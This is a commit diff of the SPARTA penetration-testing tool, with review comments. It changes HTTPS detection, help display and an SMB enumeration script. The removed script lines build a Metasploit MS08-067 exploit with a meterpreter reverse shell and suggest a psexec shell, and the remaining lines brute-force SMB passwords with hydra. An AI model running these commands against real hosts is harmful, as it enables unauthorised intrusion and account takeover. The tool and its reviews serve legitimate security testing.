Removed QtWebKit dependency (closes #94). Improved HTTPS/HTTP detection (closes #90). Removed check for ms08-067 from smbenum.sh
root
5 years ago
19 | 19 | |
20 | 20 | SPARTA 1.0.3 (BETA) |
21 | 21 | * fixed the QtWebKit import error (thx alexxn) |
22 | * fixed ms08-067_check import issue (thx chris948)⏎ | |
22 | * fixed ms08-067_check import issue (thx chris948) | |
23 | ||
24 | SPARTA 1.0.4 (BETA) | |
25 | * removed QtWebKit dependency for displaying the help menu | |
26 | * improved HTTPS/HTTP detection (experimental) | |
27 | * removed MS08-067 check from smbenum.sh |
1 | 1 | |
2 | 2 | ''' |
3 | 3 | SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) |
4 | Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
4 | Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
5 | 5 | |
6 | 6 | This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. |
7 | 7 | |
10 | 10 | You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. |
11 | 11 | ''' |
12 | 12 | |
13 | import os, sys, urllib2, socket, time, datetime, locale, webbrowser, re # for webrequests, screenshot timeouts, timestamps, browser stuff and regex | |
13 | import os, sys, urllib2, socket, time, datetime, locale, webbrowser, re, requests # for webrequests, screenshot timeouts, timestamps, browser stuff and regex | |
14 | 14 | from PyQt4 import QtGui, QtCore |
15 | 15 | from PyQt4.QtCore import * # for QProcess |
16 | import errno # temporary for isHttpd | |
16 | #import errno # temporary for isHttpd | |
17 | 17 | import subprocess # for screenshots with cutycapt |
18 | 18 | import string # for input validation |
19 | 19 | |
38 | 38 | res = (16777216 * o[0]) + (65536 * o[1]) + (256 * o[2]) + o[3] |
39 | 39 | return res |
40 | 40 | |
41 | # old function, replaced by isHttps (checking for https first is better) | |
42 | def isHttp(url): | |
41 | # checks if a web port is SSL enabled | |
42 | def isHttps(ip, port): | |
43 | headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0'} | |
43 | 44 | try: |
44 | req = urllib2.Request(url) | |
45 | req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0') | |
46 | r = urllib2.urlopen(req, timeout=10) | |
47 | #print 'response code: ' + str(r.code) | |
48 | #print 'response content: ' + str(r.read()) | |
49 | return True | |
50 | ||
51 | except urllib2.HTTPError, e: | |
52 | reason = str(sys.exc_info()[1].reason) | |
53 | # print reason | |
54 | if reason == 'Unauthorized' or reason == 'Forbidden': | |
55 | return True | |
45 | r = requests.get("https://"+ip+":"+port, headers=headers, verify=False, timeout=5) | |
46 | return True | |
47 | ||
48 | except requests.exceptions.SSLError as e: | |
56 | 49 | return False |
57 | ||
58 | except: | |
50 | ||
51 | except requests.exceptions.ConnectionError as e: | |
52 | return False | |
53 | ||
54 | except requests.exceptions.ReadTimeout as e: | |
59 | 55 | return False |
60 | ||
61 | def isHttps(ip, port): | |
62 | try: | |
63 | req = urllib2.Request('https://'+ip+':'+port) | |
64 | req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0') | |
65 | r = urllib2.urlopen(req, timeout=5) | |
66 | # print '\nresponse code: ' + str(r.code) | |
67 | # print '\nresponse content: ' + str(r.read()) | |
68 | return True | |
69 | ||
70 | except: | |
71 | reason = str(sys.exc_info()[1].reason) | |
72 | # print reason | |
73 | # if 'Interrupted system call' in reason: | |
74 | # print 'caught exception. retry?' | |
75 | ||
76 | if reason == 'Forbidden': | |
77 | return True | |
78 | return False | |
79 | ||
80 | ||
56 | ||
57 | except Exception as e: | |
58 | print e | |
59 | return True | |
60 | ||
81 | 61 | def getTimestamp(human=False): |
82 | 62 | t = time.time() |
83 | 63 | if human: |
276 | 256 | else: |
277 | 257 | self.save("http://"+url, ip, port, outputfile) |
278 | 258 | |
279 | except: | |
259 | except Exception as e: | |
280 | 260 | print '\t[-] Unable to take the screenshot. Moving on..' |
261 | print e | |
281 | 262 | continue |
282 | 263 | |
283 | 264 | self.processing = False |
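Review bot: In the new `isHttps`, the final `except Exception` handler prints the error and returns True, so any unexpected failure inside the `try` is reported as "HTTPS"; for example, a non-string `port` raising `TypeError` in the URL concatenation. Consider catching `requests.exceptions.RequestException` there and returning False for anything else. `requests.get` also follows redirects by default, so a `ConnectionError` or `ReadTimeout` on a redirected hop returns False even though the TLS handshake with `ip:port` already succeeded, and the probe may reach hosts other than the target with certificate checks off. Keeping the check on the target port is a one-argument change: `r = requests.get("https://"+ip+":"+port, headers=headers, verify=False, timeout=5, allow_redirects=False)`. A short comment that `verify=False` is deliberate for detection only, and that the result is not a trust decision, would help the next reader.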
21 | 21 | |
22 | 22 | # initialisations that will happen once - when the program is launched |
23 | 23 | def __init__(self, view, logic): |
24 | self.version = 'SPARTA 1.0.3 (BETA)' # update this everytime you commit! | |
24 | self.version = 'SPARTA 1.0.4 (BETA)' # update this everytime you commit! | |
25 | 25 | self.logic = logic |
26 | 26 | self.view = view |
27 | 27 | self.view.setController(self) |
43 | 43 | echo -e "\n########## Enumerating shares ##########" |
44 | 44 | nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP |
45 | 45 | |
46 | #echo -e "\n########## Checking for common vulnerabilities ##########" | |
47 | #nmap -Pn -T4 -sS -p139,445 --script=smb-check-vulns $IP | |
48 | #nmap -Pn -T4 -sS -p139,445 --script=smb-check-vulns --script-args=unsafe=1 $IP | |
49 | #echo -e "\nChecking for MS08-067 with metasploit. It could take a while.." | |
50 | #vulnerable=`msfcli exploits/windows/smb/ms08_067_netapi RHOST=$IP C` | |
51 | echo -e "\nChecking for MS08-067.." | |
52 | vulnerable=`python ./scripts/ms08-067_check.py -t $IP -s` | |
53 | echo $vulnerable | |
46 | echo -e "\n########## Bruteforcing all users with 'password', blank and username as password" | |
47 | hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1 | |
48 | rm /tmp/$IP-users.txt | |
54 | 49 | |
55 | #if [[ $vulnerable == *"The target is vulnerable"* ]] | |
56 | if [[ $vulnerable == *"VULNERABLE"* ]] | |
57 | then | |
58 | echo "Oh yeah! The target is vulnerable!" | |
59 | MYIP=$(ifconfig $IFACE | awk -F'[: ]+' '/inet addr:/ {print $4}') | |
60 | echo "use exploits/windows/smb/ms08_067_netapi" > /tmp/$IP-netapi.rc | |
61 | echo "set payload windows/meterpreter/reverse_tcp" >> /tmp/$IP-netapi.rc | |
62 | echo "set RHOST $IP" >> /tmp/$IP-netapi.rc | |
63 | echo "set LHOST $MYIP" >> /tmp/$IP-netapi.rc | |
64 | echo "set LPORT 443" >> /tmp/$IP-netapi.rc | |
65 | echo "set ExitOnSession false" >> /tmp/$IP-netapi.rc | |
66 | echo "exploit -j" >> /tmp/$IP-netapi.rc | |
67 | ||
68 | echo -e "\nTo exploit this host now use:" | |
69 | echo -e "msfconsole -r /tmp/$IP-netapi.rc" | |
70 | else | |
71 | echo "The target is NOT vulnerable!" | |
72 | echo -e "\n########## Bruteforcing all users with 'password', blank and username as password" | |
73 | hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1 | |
74 | rm /tmp/$IP-users.txt | |
75 | ||
76 | echo -e "\n\nTo get a shell use:" | |
77 | echo -e "/usr/local/bin/psexec.py <user>:<password>@$IP cmd.exe\n" | |
78 | fi |
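Review bot: The password-guessing step that now runs unconditionally (new lines 46-48) reads and then removes `/tmp/$IP-users.txt`, a predictable name in a world-writable directory, and `$IP` is unquoted in both commands. On a shared host another local user could pre-create or symlink that path. The file is created outside this section, so the fix belongs there too: create it with `USERS=$(mktemp)`, then use `hydra -e ns -L "$USERS" -p password "$IP" smb -t 1` and `rm -f "$USERS"`. Because the guessing is no longer gated behind the vulnerability check, a comment on the account-lockout risk for the target would also be useful.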
1 | 1 | |
2 | 2 | ''' |
3 | 3 | SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) |
4 | Copyright (c) 2018 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
4 | Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
5 | 5 | |
6 | 6 | This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. |
7 | 7 | |
25 | 25 | print e |
26 | 26 | exit(1) |
27 | 27 | |
28 | try: | |
29 | from PyQt4 import QtWebKit | |
30 | except ImportError, e: | |
31 | try: | |
32 | from PySide import QtWebKit | |
33 | except ImportError: | |
34 | print "[-] Import failed. QtWebKit library not found. \nTry installing it with: apt install python-pyside.qtwebkit" | |
35 | exit(1) | |
36 | ||
37 | 28 | from app.logic import * |
38 | 29 | from ui.gui import * |
39 | 30 | from ui.view import * |
1 | 1 | |
2 | 2 | ''' |
3 | 3 | SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) |
4 | Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
4 | Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis) | |
5 | 5 | |
6 | 6 | This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. |
7 | 7 | |
16 | 16 | from PyQt4.QtCore import * # for filters dialog |
17 | 17 | except ImportError: |
18 | 18 | print "[-] Import failed. PyQt4 library not found. \nTry installing it with: apt install python-qt4" |
19 | ||
20 | try: | |
21 | usePySide = False | |
22 | from PyQt4 import QtWebKit | |
23 | except ImportError, e: | |
24 | try: | |
25 | from PySide import QtWebKit | |
26 | usePySide = True | |
27 | except ImportError, e: | |
28 | print "[-] Import failed. QtWebKit library not found. \nTry installing it with: apt install python-pyside.qtwebkit" | |
29 | exit(1) | |
30 | 19 | |
31 | 20 | from ui.gui import * |
32 | 21 | from ui.dialogs import * |
37 | 26 | from app.processmodels import * |
38 | 27 | from app.auxiliary import * |
39 | 28 | import time #temp |
29 | import webbrowser # to open help page in browser | |
40 | 30 | |
41 | 31 | # this class handles everything gui-related |
42 | 32 | class View(QtCore.QObject): |
62 | 52 | self.importProgressWidget = ProgressWidget('Importing nmap..', self.ui.centralwidget) |
63 | 53 | self.adddialog = AddHostsDialog(self.ui.centralwidget) |
64 | 54 | self.settingsWidget = AddSettingsDialog(self.ui.centralwidget) |
65 | self.helpWidget = QtWebKit.QWebView() | |
66 | self.helpWidget.setWindowTitle('SPARTA Help') | |
67 | 55 | |
68 | 56 | # kali moves the help file so let's find it |
69 | url = './doc/help.html' | |
70 | if not os.path.exists(url): | |
71 | url = '/usr/share/doc/sparta/help.html' | |
72 | ||
73 | if usePySide: | |
74 | self.helpWidget.load(url) | |
75 | else: | |
76 | self.helpWidget.load(QUrl(url)) | |
77 | ||
57 | self.helpurl = './doc/help.html' | |
58 | if not os.path.exists(self.helpurl): | |
59 | self.helpurl = '/usr/share/doc/sparta/help.html' | |
60 | ||
78 | 61 | self.ui.HostsTableView.setSelectionMode(1) # disable multiple selection |
79 | 62 | self.ui.ServiceNamesTableView.setSelectionMode(1) |
80 | 63 | self.ui.ToolsTableView.setSelectionMode(1) |
449 | 432 | self.controller.cancelSettings() |
450 | 433 | |
451 | 434 | def connectHelp(self): |
452 | self.ui.menuHelp.triggered.connect(self.helpWidget.show) | |
435 | self.ui.menuHelp.triggered.connect(self.showHelp) | |
436 | ||
437 | def showHelp(self): | |
438 | webbrowser.open(self.helpurl) | |
453 | 439 | |
454 | 440 | ### |
455 | 441 |
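Review bot: `showHelp` passes `self.helpurl` straight to `webbrowser.open`, and the first candidate, `'./doc/help.html'`, is relative to the current working directory rather than to the SPARTA install. Which file opens, or whether the browser finds one at all, therefore depends on where the tool was launched. Resolve the path once where it is set, e.g. `self.helpurl = 'file://' + os.path.abspath(self.helpurl)`, ideally anchored to the script directory instead of the cwd. If the tool is normally started as root (not visible here), the help page now opens in a desktop browser with those privileges, which deserves a comment next to `showHelp`. The constructor that sets `helpurl` starts and ends outside the visible lines.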